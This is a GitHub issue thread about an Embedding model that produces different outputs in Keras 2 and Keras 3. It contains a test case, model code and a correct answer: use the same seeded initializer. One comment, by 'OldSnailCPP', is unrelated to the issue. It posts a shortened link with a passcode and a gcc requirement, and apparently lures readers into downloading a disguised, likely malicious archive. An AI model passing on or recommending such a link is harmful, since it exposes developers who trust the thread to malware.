### ISSUE TITLE
Call on an Embedding model doesnt produce the same result for keras 2 and keras 3 models

### ISSUE THREAD

**Issue by markomitos** [keras-team/keras#20216]
When trying to get the same result from a keras 2 and keras 3 models I noticed that there were some differences so I investigated further with this test that failed on the assertion:

```
  def test_keras2_and_keras3_model_using_embddings(self):
    keras3_model = model_examples.build_embedding_keras3_model()
    keras_model = model_examples.build_embedding_keras_model()

    input_vocab_size = 10
    xs = []
    for input_id in range(input_vocab_size):
      xs.append(input_id)
    batch = np.expand_dims(np.array(xs, dtype=np.int64), axis=-1)
    keras_output = keras_model(batch)

    keras3_output = keras3_model(batch)
    self.assertTrue(tf.reduce_all(tf.equal(keras_output, keras3_output)))
```

Here are the model functions used:

```
def build_embedding_keras_model(vocab_size=10):
  """Builds a test model with an embedding initialized to one-hot vectors."""
  keras_model = tf_keras.models.Sequential()
  keras_model.add(tf_keras.layers.Embedding(input_dim=vocab_size, output_dim=5))
  keras_model.add(tf_keras.layers.Softmax())
  return keras_model

def build_embedding_keras3_model(vocab_size=10):
  """Builds a test model with an embedding initialized to one-hot vectors."""
  keras_model = keras.models.Sequential()
  keras_model.add(keras.layers.Embedding(input_dim=vocab_size, output_dim=5))
  keras_model.add(keras.layers.Softmax())
  return keras_model
```

**Comment by OldSnailCPP** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by mehtamansi29** [comment]
Hi @markomitos -

Thanks for reporting the issue. There  is discrepancy while creating build_embedding_keras_model and build_embedding_keras3_model functions. build_embedding_keras_model function uses tf.keras API(keras2) for creating layers and build_embedding_keras3_model function uses keras API(keras3) for creating layers.

**Comment by markomitos** [comment]
@mehtamansi29 That is intended, I am refactoring TensorFlow Federated to support both keras 2 and keras 3 and need to know whethet they yield the same result when a same model is called in both APIs

**Comment by Doch88** [comment]
The problem is that you don't specify an initializer, simply define one with the same seed and the result will be the same:
```
def build_embedding_keras_model(vocab_size=10):
  """Builds a test model with an embedding initialized to one-hot vectors."""
  keras_model = tf.keras.models.Sequential()
  initializer = tf.keras.initializers.RandomUniform(seed=42)
  keras_model.add(tf.keras.layers.Embedding(input_dim=vocab_size, output_dim=5, embeddings_initializer=initializer))
  keras_model.add(tf.keras.layers.Softmax())
  return keras_model

def build_embedding_keras3_model(vocab_size=10):
  """Builds a test model with an embedding initialized to one-hot vectors."""
  keras_model = keras.models.Sequential()
  initializer = tf.keras.initializers.RandomUniform(seed=42)
  keras_model.add(keras.layers.Embedding(input_dim=vocab_size, output_dim=5, embeddings_initializer=initializer))
  keras_model.add(keras.layers.Softmax())
  return keras_model
```
Otherwise you will use a random seed, which will be different for both the models.
